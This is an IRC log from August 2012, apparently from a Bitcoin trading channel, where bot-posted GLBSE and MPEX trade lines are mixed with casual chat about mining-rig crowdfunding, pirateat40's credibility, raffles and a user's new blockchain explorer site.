00:06:10 lawls Aug 22 00:06:13 I just got up an hour ago Aug 22 00:07:11 Diablo-D3: i got up at 9:30pm yesterday Aug 22 00:07:21 https://bitcointalk.org/index.php?topic=98767.msg1120401#msg1120401 Aug 22 00:07:39 these are the hours bitvps requires me to kee[ Aug 22 00:08:03 It's funny how just a word or two is changed every line to a synonym of some sort. Aug 22 00:08:18 ask them why they decided it was OK to rip off your work Aug 22 00:08:48 [GLBSE] [TYGRR.BOND-P] 6 @ 0.41000001 = 2.46 BTC [-] Aug 22 00:09:35 [GLBSE] [OBSI.HRPT] 99 @ 0.1037 = 10.2663 BTC [+] Aug 22 00:10:41 ok Aug 22 00:10:41 i asked Aug 22 00:11:04 [MPEX] [F.GIGA.ETF] 4100 @ 0.00101616 = 4.1663 BTC [-] Aug 22 00:11:05 [MPEX] [F.GIGA.ETF] 600 @ 0.00101559 = 0.6094 BTC [-] Aug 22 00:11:07 [MPEX] [F.GIGA.ETF] 603 @ 0.00101544 = 0.6123 BTC [-] Aug 22 00:11:15 +1 rg Aug 22 00:11:16 I think I already know the answer: "U writ gud inglish, I lazy... Fuck SOPA!" Aug 22 00:11:29 [GLBSE] [TYGRR.BOND-P] 15 @ 0.410002 = 6.15 BTC [+] Aug 22 00:11:40 Something along those lines. Aug 22 00:12:04 Or he paid 0.10 BTC for someone to write a FAQ for him. Aug 22 00:12:10 lol, ouch Aug 22 00:12:21 Where first statement about "I lazy" would still apply Aug 22 00:12:43 what's funny is Aug 22 00:12:49 hes asking for money to build mining rigs Aug 22 00:12:51 [MPEX] [S.MPOE] 10100 @ 0.00039648 = 4.0044 BTC [+] Aug 22 00:12:54 look at the computer cases in his pictures Aug 22 00:12:57 [GLBSE] [TYGRR.BOND-P] 15 @ 0.410002 = 6.15 BTC [+] Aug 22 00:12:58 [GLBSE] [TYGRR.BOND-P] 45 @ 0.41000001 = 18.45 BTC [-] Aug 22 00:13:10 'sorry, we ran over budget.. i couldnt afford the LED's i wanted for the mining rigs!' Aug 22 00:13:34 [GLBSE] [TYGRR.BOND-P] 50 @ 0.41000201 = 20.5001 BTC [+] Aug 22 00:13:36 [GLBSE] [TYGRR.BOND-P] 49 @ 0.41000001 = 20.09 BTC [-] Aug 22 00:13:37 [GLBSE] [TYGRR.BOND-P] 10 @ 0.41 = 4.1 BTC [-] Aug 22 00:13:38 [GLBSE] [TYGRR.BOND-P] 1 @ 0.4 BTC [-] Aug 22 00:14:19 Why did he left the stereo in the background? Aug 22 00:14:39 im not sure why he did left it Aug 22 00:14:49 <@assbot> [GLBSE] [MPOE.ETF] 8 @ 1.4 = 11.2 BTC [+] <<< oooh, someone eating into that askwall Aug 22 00:14:53 I think the PC with LED and stereo in the background are unrelated... Aug 22 00:14:58 just showing the box then content... Aug 22 00:15:05 i doubt it Aug 22 00:15:12 the mining rigs are going to be 24 bit Aug 22 00:15:13 color Aug 22 00:15:46 [GLBSE] [TYGRR.BOND-P] 1 @ 0.38 BTC [-] Aug 22 00:16:00 case colors make the miner go faster Aug 22 00:16:10 [GLBSE] [FOO.PPPPT] 8 @ 0.4 = 3.2 BTC [-] Aug 22 00:16:17 maybe i can convince some more people on the forum to hammer 'speed holes' into thier mining rigs Aug 22 00:17:17 Oh... 24 bit color? So by mining rigs he meant computers to play minecraft or something? Aug 22 00:17:26 no Aug 22 00:17:29 24bit LEDS Aug 22 00:17:37 on the front of the case Aug 22 00:17:56 it makes the miners faster Aug 22 00:18:02 then you cut some holds in the case Aug 22 00:18:03 for speed Aug 22 00:20:02 Ah, seems logic too eh Aug 22 00:20:13 Wow…PPT prices... Aug 22 00:20:25 speed holes + leds on front of case = better mining rig than gigavs Aug 22 00:20:35 with 1 nvidia 8800 gt Aug 22 00:20:36 yeah, who's dumping BOND-P at .38??? Aug 22 00:20:45 ppt price isnt .. 0? Aug 22 00:21:56 Pirate was saying stuff about being drunk and putting the ask walls, block the buys Aug 22 00:22:12 PPT prices suddenly started dropping Aug 22 00:22:17 [GLBSE] [YABMC] 4 @ 0.128 = 0.512 BTC [-] Aug 22 00:22:19 Might or might not be related Aug 22 00:22:23 peple are so dumb Aug 22 00:22:46 pirate could say nanotube was the market manipulator Aug 22 00:22:48 and people would believe it Aug 22 00:23:13 [GLBSE] [YABMC] 30 @ 0.127 = 3.81 BTC [-] Aug 22 00:23:34 ;;later tell nasdaqenema you *still* owe me 5 btc... Aug 22 00:23:35 The operation succeeded. Aug 22 00:23:43 [GLBSE] [YABMC] 8 @ 0.1261 = 1.0088 BTC [-] Aug 22 00:23:45 [GLBSE] [YABMC] 163 @ 0.126 = 20.538 BTC [-] Aug 22 00:24:38 "<@pirateat40> Anduck, just blocking buys and selling the coins out of the system." Aug 22 00:24:59 "<@pirateat40> btw, pirate has been drinking." Aug 22 00:25:03 doesnt mean shit Aug 22 00:25:20 half the magic of his services/companies are mis-information Aug 22 00:25:31 I know, he's probably the biggest troll of his own channel... Aug 22 00:25:32 he never gives out numbers Aug 22 00:25:44 and when he does Aug 22 00:25:46 you cant even trust them Aug 22 00:26:10 i doubt pirate really had 500k btc Aug 22 00:29:01 [GLBSE] [TYGRR.BOND-P] 2 @ 0.3 = 0.6 BTC [-] Aug 22 00:29:03 [GLBSE] [TYGRR.BOND-P] 1 @ 0.22 BTC [-] Aug 22 00:29:04 [GLBSE] [TYGRR.BOND-P] 42 @ 0.21000001 = 8.82 BTC [-] Aug 22 00:29:23 [GLBSE] [DMC] 500 @ 0.052 = 26 BTC [+] Aug 22 00:30:26 "amount" : 4.00719600, Aug 22 00:30:26 "confirmations" : 0, Aug 22 00:30:27 haha Aug 22 00:30:28 i won again Aug 22 00:31:00 sd? Aug 22 00:31:11 rg: You're going to end up with a Satoshi soon Aug 22 00:31:14 [GLBSE] [ASICMINER] 40 @ 0.0988 = 3.952 BTC [+] Aug 22 00:31:25 i have plenty of satoshis Aug 22 00:31:32 and i won that casacius coin on bitdraw Aug 22 00:31:36 yesterday Aug 22 00:31:43 i guess im just made of luck Aug 22 00:33:06 [GLBSE] [TICKER] 2 @ 0.46 = 0.92 BTC [+] Aug 22 00:33:31 !ticker ticker Aug 22 00:33:33 [GLBSE:TICKER] [Bid: 0.33] [Ask: 0.46] [Spread: 0.13] [Last: 0.46] [24hVol: ] [7dAvg: ] Aug 22 00:33:37 LOGIC ERROR Aug 22 00:33:46 :D Aug 22 00:34:40 bitdraw? Aug 22 00:35:03 https://www.bitdraw.com/raffles Aug 22 00:35:21 [GLBSE] [TYGRR.BOND-PI] 100 @ 1 = 100 BTC [+] Aug 22 00:35:30 [GLBSE] [BIB.PIRATE] 8 @ 0.32 = 2.56 BTC [-] Aug 22 00:36:23 [GLBSE] [TYGRR.BOND-P] 61 @ 0.5 = 30.5 BTC [+] Aug 22 00:43:23 [GLBSE] [OBSI.HRPT] 5 @ 0.1037 = 0.5185 BTC [+] Aug 22 00:48:43 [MPEX] [F.GIGA.ETF] 2597 @ 0.00101544 = 2.6371 BTC [-] Aug 22 00:48:45 [MPEX] [F.GIGA.ETF] 2222 @ 0.00099973 = 2.2214 BTC [-] Aug 22 00:55:33 [GLBSE] [BMF] 4 @ 0.59 = 2.36 BTC [+] Aug 22 00:58:15 "balance" : 28954.20000000, Aug 22 00:58:29 s/that/than Aug 22 01:00:02 [GLBSE] [FOO.PPPPT] 1 @ 0.3 BTC [-] Aug 22 01:00:33 [GLBSE] [TYGRR.BOND-P] 1 @ 0.31 BTC [-] Aug 22 01:00:46 [GLBSE] [MPOE.ETF] 20 @ 1.36 = 27.2 BTC [-] Aug 22 01:00:48 [GLBSE] [MPOE.ETF] 15 @ 1.35 = 20.25 BTC [-] Aug 22 01:02:02 [GLBSE] [TYGRR.BOND-PI] 17 @ 1 = 17 BTC [+] Aug 22 01:03:07 [GLBSE] [OBSI.1MHS] 6 @ 0.08234567 = 0.4941 BTC [-] Aug 22 01:03:07 [GLBSE] [OBSI.1MHS] 10 @ 0.074001 = 0.74 BTC [-] Aug 22 01:03:09 [GLBSE] [OBSI.1MHS] 30 @ 0.074 = 2.22 BTC [-] Aug 22 01:03:10 [GLBSE] [OBSI.1MHS] 10 @ 0.07 = 0.7 BTC [-] Aug 22 01:04:22 [GLBSE] [YABMC] 1 @ 0.13 BTC [+] Aug 22 01:04:55 [GLBSE] [YABMC] 1 @ 0.13 BTC [+] Aug 22 01:11:47 [GLBSE] [TYGRR.BOND-PI] 16 @ 1 = 16 BTC [+] Aug 22 01:18:45 "Only the Japanese could come up with something so insidiously delicious. And, you see the hole? That’s where they inject the cream. That’s how you know it’s Japanese!" Aug 22 01:23:42 [GLBSE] [007] 2 @ 0.185 = 0.37 BTC [-] Aug 22 01:23:44 [GLBSE] [007] 2 @ 0.18 = 0.36 BTC [-] Aug 22 01:23:45 [GLBSE] [007] 1 @ 0.17 BTC [-] Aug 22 01:28:07 [GLBSE] [BITCOINTORRENTZ] 10 @ 0.54 = 5.4 BTC [+] Aug 22 01:28:09 [GLBSE] [BITCOINTORRENTZ] 2 @ 0.55 = 1.1 BTC [+] Aug 22 01:28:10 [GLBSE] [BITCOINTORRENTZ] 5 @ 0.555 = 2.775 BTC [+] Aug 22 01:28:26 [GLBSE] [BDK.BND] 100 @ 0.101 = 10.1 BTC [-] Aug 22 01:29:20 [MPEX] [F.GIGA.ETF] 2316 @ 0.00102458 = 2.3729 BTC [+] Aug 22 01:29:22 [MPEX] [F.GIGA.ETF] 294 @ 0.00102546 = 0.3015 BTC [+] Aug 22 01:29:23 [MPEX] [F.GIGA.ETF] 10700 @ 0.00102599 = 10.9781 BTC [+] Aug 22 01:29:24 [MPEX] [F.GIGA.ETF] 3290 @ 0.00102695 = 3.3787 BTC [+] Aug 22 01:29:26 [GLBSE] [ASICMINER] 14 @ 0.0988 = 1.3832 BTC [+] Aug 22 01:29:49 [GLBSE] [FOO.PPPPT] 10 @ 0.31 = 3.1 BTC [+] Aug 22 01:32:29 [GLBSE] [FPGAMINING] 2 @ 0.99999 = 2 BTC [+] Aug 22 01:32:30 [GLBSE] [FPGAMINING] 1 @ 0.9999999 BTC [+] Aug 22 01:33:01 [MPEX] [F.GIGA.ETF] 2710 @ 0.00102695 = 2.783 BTC [+] Aug 22 01:33:03 [MPEX] [F.GIGA.ETF] 2190 @ 0.00102706 = 2.2493 BTC [+] Aug 22 01:33:14 [GLBSE] [BIB.PIRATE] 2 @ 0.35 = 0.7 BTC [+] Aug 22 01:33:38 [GLBSE] [NYAN] 3 @ 1 = 3 BTC [+] Aug 22 01:34:48 [GLBSE] [TYGRR.BOND-PI] 5 @ 1 = 5 BTC [+] Aug 22 01:35:14 [MPEX] [S.MPOE] 12161 @ 0.0003955 = 4.8097 BTC [-] Aug 22 01:35:16 [MPEX] [S.MPOE] 1639 @ 0.00039648 = 0.6498 BTC [+] Aug 22 01:36:03 [GLBSE] [PUREMINING] 17 @ 0.1381 = 2.3477 BTC [-] Aug 22 01:37:36 [GLBSE] [YABMC] 50 @ 0.13 = 6.5 BTC [+] Aug 22 01:39:08 [GLBSE] [ASICMINER] 50 @ 0.0988 = 4.94 BTC [+] Aug 22 01:40:02 [GLBSE] [BIB.PIRATE] 10 @ 0.31 = 3.1 BTC [-] Aug 22 01:41:16 [GLBSE] [NYAN.B] 4 @ 0.99 = 3.96 BTC [-] Aug 22 01:44:21 [GLBSE] [ASICMINER] 1 @ 0.098 BTC [-] Aug 22 01:54:16 [GLBSE] [OBSI.HRPT] 2 @ 0.1038 = 0.2076 BTC [+] Aug 22 01:55:30 [GLBSE] [MMM] 10 @ 0.8 = 8 BTC [+] Aug 22 02:00:12 !ticker mpoe.etf Aug 22 02:00:15 [GLBSE:MPOE.ETF] [Bid: 1.35] [Ask: 1.4] [Spread: 0.05] [Last: 1.35] [24hVol: 58.65] [7dAvg: 1.39369986] Aug 22 02:00:37 .py 4000000*.00039 Aug 22 02:00:38 1560.0 Aug 22 02:00:57 .py 1560.0/1110 Aug 22 02:00:58 1.40540540541 Aug 22 02:02:20 looks like the peeps on glbse are a little short mpex Aug 22 02:06:59 [MPEX] [S.MPOE] 50900 @ 0.00039362 = 20.0353 BTC [-] Aug 22 02:15:39 [GLBSE] [BIB.PIRATE] 10 @ 0.31 = 3.1 BTC [-] Aug 22 02:15:40 [GLBSE] [BIB.PIRATE] 14 @ 0.3 = 4.2 BTC [-] Aug 22 02:21:05 [GLBSE] [FZB.A] 10 @ 0.0331 = 0.331 BTC [-] Aug 22 02:21:06 [GLBSE] [FZB.A] 39 @ 0.033 = 1.287 BTC [-] Aug 22 02:22:06 !ticker TYGRR.BOND-P Aug 22 02:22:12 [GLBSE:TYGRR.BOND-P] [Bid: 0.4] [Ask: 0.47] [Spread: 0.07] [Last: 0.31] [24hVol: 1,065.30383976] [7dAvg: 0.80172738] Aug 22 02:28:39 DMC mh/share is now 5.552 Aug 22 02:30:30 [GLBSE] [MMM] 5 @ 0.8 = 4 BTC [+] Aug 22 02:33:06 [GLBSE] [ASICMINER] 2 @ 0.098 = 0.196 BTC [-] Aug 22 02:33:28 [GLBSE] [OBSI.HRPT] 1 @ 0.1049999 BTC [+] Aug 22 02:34:37 [GLBSE] [NYAN.C] 1 @ 0.94 BTC [-] Aug 22 02:41:27 [GLBSE] [TYGRR.BOND-P] 1 @ 0.47 BTC [+] Aug 22 02:42:29 [GLBSE] [YABMC] 15 @ 0.1301 = 1.9515 BTC [+] Aug 22 02:42:30 [GLBSE] [YABMC] 75 @ 0.13 = 9.75 BTC [-] Aug 22 02:44:29 [GLBSE] [TYGRR.BOND-P] 14 @ 0.47 = 6.58 BTC [+] Aug 22 02:48:32 [GLBSE] [TYGRR.BOND-P] 12 @ 0.49999 = 5.9999 BTC [+] Aug 22 02:50:01 [MPEX] [S.MPOE] 9800 @ 0.00039228 = 3.8443 BTC [-] Aug 22 02:50:02 [MPEX] [S.MPOE] 1801 @ 0.00039648 = 0.7141 BTC [+] Aug 22 02:50:03 [MPEX] [S.MPOE] 4917 @ 0.00040178 = 1.9756 BTC [+] Aug 22 02:50:04 [MPEX] [S.MPOE] 5293 @ 0.00040249 = 2.1304 BTC [+] Aug 22 02:50:29 [GLBSE] [BIB.PIRATE] 10 @ 0.48 = 4.8 BTC [+] Aug 22 02:57:04 [MPEX] [S.MPOE] 5100 @ 0.00038581 = 1.9676 BTC [-] Aug 22 02:57:33 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:02:17 [GLBSE] [FOO.PPPPT] 10 @ 0.301 = 3.01 BTC [-] Aug 22 03:03:01 [GLBSE] [BIB.PIRATE] 17 @ 0.3001 = 5.1017 BTC [-] Aug 22 03:03:26 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:04:09 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:06:42 [GLBSE] [TYGRR.BOND-P] 18 @ 0.49999 = 8.9998 BTC [+] Aug 22 03:07:55 [GLBSE] [TYGRR.BOND-P] 10 @ 0.49999 = 4.9999 BTC [+] Aug 22 03:08:07 [GLBSE] [MERGEDMINING] 5 @ 0.079 = 0.395 BTC [-] Aug 22 03:08:09 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:08:22 [GLBSE] [TYGRR.BOND-P] 4 @ 0.5 = 2 BTC [+] Aug 22 03:08:31 [GLBSE] [BITCOINRS] 2 @ 0.042 = 0.084 BTC [-] Aug 22 03:08:36 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:08:41 [MPEX] [F.GIGA.ETF] 4400 @ 0.00102706 = 4.5191 BTC [+] Aug 22 03:08:58 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:09:47 [GLBSE] [BITBOND] 4 @ 0.3951 = 1.5804 BTC [-] Aug 22 03:10:14 [GLBSE] [BITBOND] 1 @ 0.3951 BTC [-] Aug 22 03:18:05 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:18:36 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:19:43 [GLBSE] [MMM] 4 @ 0.8 = 3.2 BTC [+] Aug 22 03:20:23 [GLBSE] [TYGRR.BOND-P] 3 @ 0.42 = 1.26 BTC [-] Aug 22 03:20:28 [GLBSE] [MMM] 1 @ 0.8 BTC [+] Aug 22 03:20:59 [GLBSE] [TYGRR.BOND-P] 20 @ 0.5 = 10 BTC [+] Aug 22 03:21:01 [GLBSE] [TYGRR.BOND-P] 5 @ 0.5 = 2.5 BTC [+] Aug 22 03:22:33 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:23:19 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:23:40 [MPEX] [S.MPOE] 39507 @ 0.00040249 = 15.9012 BTC [+] Aug 22 03:23:41 [MPEX] [S.MPOE] 1116 @ 0.00040309 = 0.4498 BTC [+] Aug 22 03:23:43 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:24:24 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:24:48 [GLBSE] [FUTUREFUND] 1 @ 0.0001195 BTC [+] Aug 22 03:25:32 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:25:37 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:26:02 [GLBSE] [MMM] 5 @ 0.8 = 4 BTC [+] Aug 22 03:26:08 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:26:34 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:26:59 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:27:21 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:27:42 [GLBSE] [STANDARD.GOLD] 1 @ 0.000053 BTC [+] Aug 22 03:31:46 [GLBSE] [BTC-MINING] 15 @ 0.98999 = 14.8499 BTC [-] Aug 22 03:34:47 [GLBSE] [GIGAMINING] 4 @ 1.0101 = 4.0404 BTC [+] Aug 22 03:34:49 [GLBSE] [GIGAMINING] 4 @ 1.01 = 4.04 BTC [-] Aug 22 03:34:50 [GLBSE] [GIGAMINING] 2 @ 1 = 2 BTC [-] Aug 22 03:34:52 [GLBSE] [GIGAMINING] 233 @ 1 = 233 BTC [-] Aug 22 03:39:03 [MPEX] [S.MPOE] 7784 @ 0.00040309 = 3.1377 BTC [+] Aug 22 03:43:35 [GLBSE] [BITBOND] 5 @ 0.3989 = 1.9945 BTC [+] Aug 22 03:43:37 [GLBSE] [BITBOND] 95 @ 0.399 = 37.905 BTC [+] Aug 22 03:43:38 [GLBSE] [BITBOND] 7 @ 0.4 = 2.8 BTC [+] Aug 22 03:43:39 [GLBSE] [BITBOND] 18 @ 0.4 = 7.2 BTC [+] Aug 22 03:43:40 [GLBSE] [BITBOND] 13 @ 0.401906 = 5.2248 BTC [+] Aug 22 03:45:47 [MPEX] [F.GIGA.ETF] 1774 @ 0.00100872 = 1.7895 BTC [-] Aug 22 03:47:26 [GLBSE] [NASTY] 4 @ 0.6501 = 2.6004 BTC [-] Aug 22 03:50:30 [GLBSE] [NYAN.C] 8 @ 0.93 = 7.44 BTC [-] Aug 22 03:50:32 [GLBSE] [NYAN.C] 6 @ 0.94 = 5.64 BTC [+] Aug 22 03:52:26 [GLBSE] [PPT.B] 2 @ 1.175 = 2.35 BTC [-] Aug 22 03:59:23 [MPEX] [S.MPOE] 8800 @ 0.00040349 = 3.5507 BTC [+] Aug 22 04:04:16 smickles well, looks more like the price's been glued there and as mpex price floats they move long/short lol Aug 22 04:07:06 [GLBSE] [NASTY] 5 @ 0.6501 = 3.2505 BTC [-] Aug 22 04:07:08 [GLBSE] [NASTY] 7 @ 0.65 = 4.55 BTC [-] Aug 22 04:10:22 [GLBSE] [TYGRR.BOND-P] 8 @ 0.40011004 = 3.2009 BTC [-] Aug 22 04:10:57 [GLBSE] [TYGRR.BOND-P] 10 @ 0.4001 = 4.001 BTC [-] Aug 22 04:11:46 [GLBSE] [TYGRR.BOND-P] 2 @ 0.4 = 0.8 BTC [-] Aug 22 04:11:48 [GLBSE] [TYGRR.BOND-P] 6 @ 0.4 = 2.4 BTC [-] Aug 22 04:13:10 [GLBSE] [TYGRR.BOND-P] 25 @ 0.35 = 8.75 BTC [-] Aug 22 04:14:25 [GLBSE] [TYGRR.BOND-P] 1 @ 0.34 BTC [-] Aug 22 04:14:54 [GLBSE] [TYGRR.BOND-P] 20 @ 0.336 = 6.72 BTC [-] Aug 22 04:15:26 [GLBSE] [TYGRR.BOND-P] 10 @ 0.336 = 3.36 BTC [-] Aug 22 04:15:28 [GLBSE] [TYGRR.BOND-P] 97 @ 0.334001 = 32.3981 BTC [-] Aug 22 04:15:29 [GLBSE] [TYGRR.BOND-P] 100 @ 0.33333001 = 33.333 BTC [-] Aug 22 04:15:29 [GLBSE] [TYGRR.BOND-P] 821 @ 0.33333 = 273.6639 BTC [-] Aug 22 04:15:48 [GLBSE] [BIF.BTCST.PPT] 5 @ 0.151 = 0.755 BTC [-] Aug 22 04:15:57 [GLBSE] [FOO.PPPPT] 1 @ 0.32 BTC [+] Aug 22 04:16:34 wow i got in at .33333 Aug 22 04:16:43 crazy Aug 22 04:17:36 you just bought 1000 of them? Aug 22 04:17:45 821 Aug 22 04:17:49 nice Aug 22 04:17:59 [GLBSE] [BIB.PIRATE] 10 @ 0.4799 = 4.799 BTC [+] Aug 22 04:19:36 [GLBSE] [UDN] 5 @ 0.10699 = 0.535 BTC [-] Aug 22 04:20:30 [GLBSE] [UDN] 15 @ 0.107 = 1.605 BTC [+] Aug 22 04:21:45 [MPEX] [F.GIGA.ETF] 6978 @ 0.00099973 = 6.9761 BTC [-] Aug 22 04:21:47 [MPEX] [F.GIGA.ETF] 3922 @ 0.00099074 = 3.8857 BTC [-] Aug 22 04:30:41 still no users damn : Aug 22 04:30:43 ;> Aug 22 04:30:54 at least i got typos. Aug 22 04:31:15 kakobreklaa: users of what? Aug 22 04:31:24 of smpake service :) Aug 22 04:31:44 which is what exactly? Aug 22 04:31:47 wgats smpake stanf for anyway ? Aug 22 04:32:17 MoneyIsDebt http://smpake.com/ Aug 22 04:33:53 ah, that's useful Aug 22 04:34:00 goes to my bookmarks Aug 22 04:34:10 The name isn't easy to remember... Aug 22 04:34:12 mircea_popescu, its a bit complicated, its more of a saying.... literally it would go '[go] here and [go] there' or less literally meaning no specific place Aug 22 04:34:27 Can't you find an easier url? Aug 22 04:34:36 i had this at hand. Aug 22 04:35:06 well Aug 22 04:35:10 any suggestions for the name Aug 22 04:35:18 if i get some users i can change the name Aug 22 04:35:27 aha... Aug 22 04:35:49 Or maybe if you change the name, you'll get more users :D Aug 22 04:35:50 well im out. take care all Aug 22 04:35:55 cia Aug 22 04:35:57 nite Aug 22 04:35:57 ciao Aug 22 04:36:14 i cant justify speding 5$ for a new domain Aug 22 04:36:18 if i have unused ones Aug 22 04:36:38 Ok, just my two bitcents ;) Aug 22 04:36:39 well Aug 22 04:36:44 i can justify Aug 22 04:36:58 i just need to see if people want this before Aug 22 04:37:02 at all Aug 22 04:37:05 kakobreklaa: Call it Portal 3 and you'll get a lot of google hits Aug 22 04:37:10 lol Aug 22 04:38:17 well feel free to test it or use it Aug 22 04:38:30 comments welcome here on in teh forum https://bitcointalk.org/index.php?topic=102176.0 Aug 22 04:39:15 ill work on permanent shortcuts tomorrow Aug 22 04:41:08 I think it can be a really usefull service for arbitreurs Aug 22 04:41:32 arbitrageurs Aug 22 04:41:34 yeah, but there needs to be shortcuts to other exchanges as well Aug 22 04:41:36 (if that's how they're called) Aug 22 04:41:38 lol Aug 22 04:41:46 :) Aug 22 04:41:53 Thank you copumpkin Aug 22 04:41:57 a transaction view if anyone is curious http://smpake.com/tx.php?tx=db46d09017214c11a2a22fb860e4efd55089dfc34f3b9968fb665208c10604e6 Aug 22 04:42:09 [GLBSE] [TYGRR.BOND-P] 6 @ 0.49999999 = 3 BTC [+] Aug 22 04:42:47 looks good Aug 22 04:44:13 [MPEX] [S.MPOE] 3316 @ 0.00040349 = 1.338 BTC [+] Aug 22 04:44:14 [MPEX] [S.MPOE] 32884 @ 0.00039586 = 13.0175 BTC [-] Aug 22 04:44:48 [MPEX] [S.MPOE] 25400 @ 0.00040547 = 10.2989 BTC [+] Aug 22 04:44:50 [MPEX] [S.MPOE] 13300 @ 0.00040707 = 5.414 BTC [+] Aug 22 04:44:51 [MPEX] [S.MPOE] 20040 @ 0.00040749 = 8.1661 BTC [+] Aug 22 04:44:52 [MPEX] [S.MPOE] 260 @ 0.00041009 = 0.1066 BTC [+] **** BEGIN LOGGING AT Wed Aug 22 11:44:02 2012 Aug 22 11:44:08 no fucking way Aug 22 11:44:12 how did you get a fucking spoof Aug 22 11:44:13 I'm planning on giving customers of hotwallet a free yubikey Aug 22 11:45:09 [GLBSE] [FPGAMINING] 18 @ 0.97 = 17.46 BTC [+] Aug 22 11:45:12 rg who to the what nao ? Aug 22 11:45:17 spoofs? Aug 22 11:48:23 rg: ask in #freenode Aug 22 11:49:33 [MPEX] [S.MPOE] 9886 @ 0.0004102 = 4.0552 BTC [+] Aug 22 11:49:35 [MPEX] [S.MPOE] 5314 @ 0.00041171 = 2.1878 BTC [+] Aug 22 11:51:19 well shit Aug 22 11:51:28 my keyboard konked out Aug 22 11:51:34 had to restart Aug 22 11:52:29 ;;ticker Aug 22 11:52:30 Best bid: 9.72758, Best ask: 9.8124, Bid-ask spread: 0.08482, Last trade: 9.72756, 24 hour volume: 69718, 24 hour low: 9.5714, 24 hour high: 10.29999 Aug 22 11:54:01 [MPEX] [S.MPOE] 3600 @ 0.00041171 = 1.4822 BTC [+] Aug 22 11:54:49 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.06153221 = 61.5322 BTC [+] Aug 22 12:05:25 [GLBSE] [OBSI.HRPT] 25 @ 0.10496 = 2.624 BTC [+] Aug 22 12:05:55 [MPEX] [S.MPOE] 21285 @ 0.00041171 = 8.7632 BTC [+] Aug 22 12:06:06 [GLBSE] [BIF.BTCST.PPT] 2 @ 0.375 = 0.75 BTC [+] Aug 22 12:06:08 [GLBSE] [BIF.BTCST.PPT] 20 @ 0.31 = 6.2 BTC [-] Aug 22 12:06:09 [GLBSE] [BIF.BTCST.PPT] 3 @ 0.30200001 = 0.906 BTC [-] Aug 22 12:06:30 [GLBSE] [ASICMINER] 50 @ 0.098 = 4.9 BTC [-] Aug 22 12:06:40 [GLBSE] [BIB.PIRATE] 1 @ 0.31100001 BTC [-] Aug 22 12:08:23 [MPEX] [F.GIGA.ETF] 3700 @ 0.0010311 = 3.8151 BTC [+] Aug 22 12:16:24 [MPEX] [S.MPOE] 11128 @ 0.00040006 = 4.4519 BTC [-] Aug 22 12:17:30 [GLBSE] [PPT.B] 10 @ 1 = 10 BTC [-] Aug 22 12:17:32 [GLBSE] [PPT.B] 100 @ 1 = 100 BTC [-] Aug 22 12:18:22 [GLBSE] [PPT.A] 5 @ 1 = 5 BTC [-] Aug 22 12:18:23 [GLBSE] [PPT.A] 100 @ 1 = 100 BTC [-] Aug 22 12:20:29 [MPEX] [F.GIGA.ETF] 4249 @ 0.0010339 = 4.393 BTC [+] Aug 22 12:20:31 [MPEX] [F.GIGA.ETF] 4200 @ 0.00103514 = 4.3476 BTC [+] Aug 22 12:20:32 [MPEX] [F.GIGA.ETF] 100 @ 0.00103579 = 0.1036 BTC [+] Aug 22 12:20:33 [MPEX] [F.GIGA.ETF] 4900 @ 0.00103616 = 5.0772 BTC [+] Aug 22 12:20:34 [MPEX] [F.GIGA.ETF] 4762 @ 0.0010387 = 4.9463 BTC [+] Aug 22 12:25:55 for some reason Aug 22 12:25:59 this porn site keeps unmuting their pron Aug 22 12:26:04 its getting vrey annoying Aug 22 12:32:31 [MPEX] [O.BTCUSD.C090T] 6 @ 0.13164126 = 0.7898 BTC [-] Aug 22 12:32:31 [MPEX] [O.BTCUSD.C090T] 7 @ 0.12710162 = 0.8897 BTC [-] Aug 22 12:32:33 [MPEX] [O.BTCUSD.C090T] 987 @ 0.10696144 = 105.5709 BTC [-] Aug 22 12:40:22 [GLBSE] [BITBOND] 4 @ 0.47 = 1.88 BTC [+] Aug 22 12:41:10 [GLBSE] [BITBOND] 6 @ 0.479 = 2.874 BTC [+] Aug 22 12:41:54 [GLBSE] [OBSI.HRPT] 31 @ 0.10496 = 3.2538 BTC [+] Aug 22 12:42:58 [GLBSE] [OBSI.HRPT] 50 @ 0.10496 = 5.248 BTC [+] Aug 22 12:49:13 since no one looks in long term offers anymore, i'm offering a Kraken passthrough: https://bitcointalk.org/index.php?topic=102433.msg1122497#msg1122497 Aug 22 12:50:53 dust-otc where ? Aug 22 12:51:10 mornin Aug 22 12:51:12 heya Aug 22 12:52:59 in the thread I linked Aug 22 12:53:09 it isn't trade on an exchange Aug 22 12:53:24 o o i see Aug 22 12:53:35 i thought you were offering a passthrough to the KRAKEN asset Aug 22 12:53:40 lol Aug 22 12:53:43 which i think is also a passthrough for the same thing or w/e Aug 22 12:53:45 confusing tbh Aug 22 12:54:07 yeah the ticker symbol sounds too official Aug 22 12:54:24 i hadn't even known it's harnett's fund thingee till i read now. Aug 22 12:54:32 [GLBSE] [GIGAMINING] 1 @ 1.03418 BTC [+] Aug 22 12:55:03 so basically what you're doing is, you want a 4 ot 8 week loan collateralized Aug 22 12:55:46 sure Aug 22 12:56:03 ;;calc 100 - 67 Aug 22 12:56:03 33 Aug 22 12:56:07 there were a ton of people who wanted to get in on it Aug 22 12:56:08 ;;calc 33 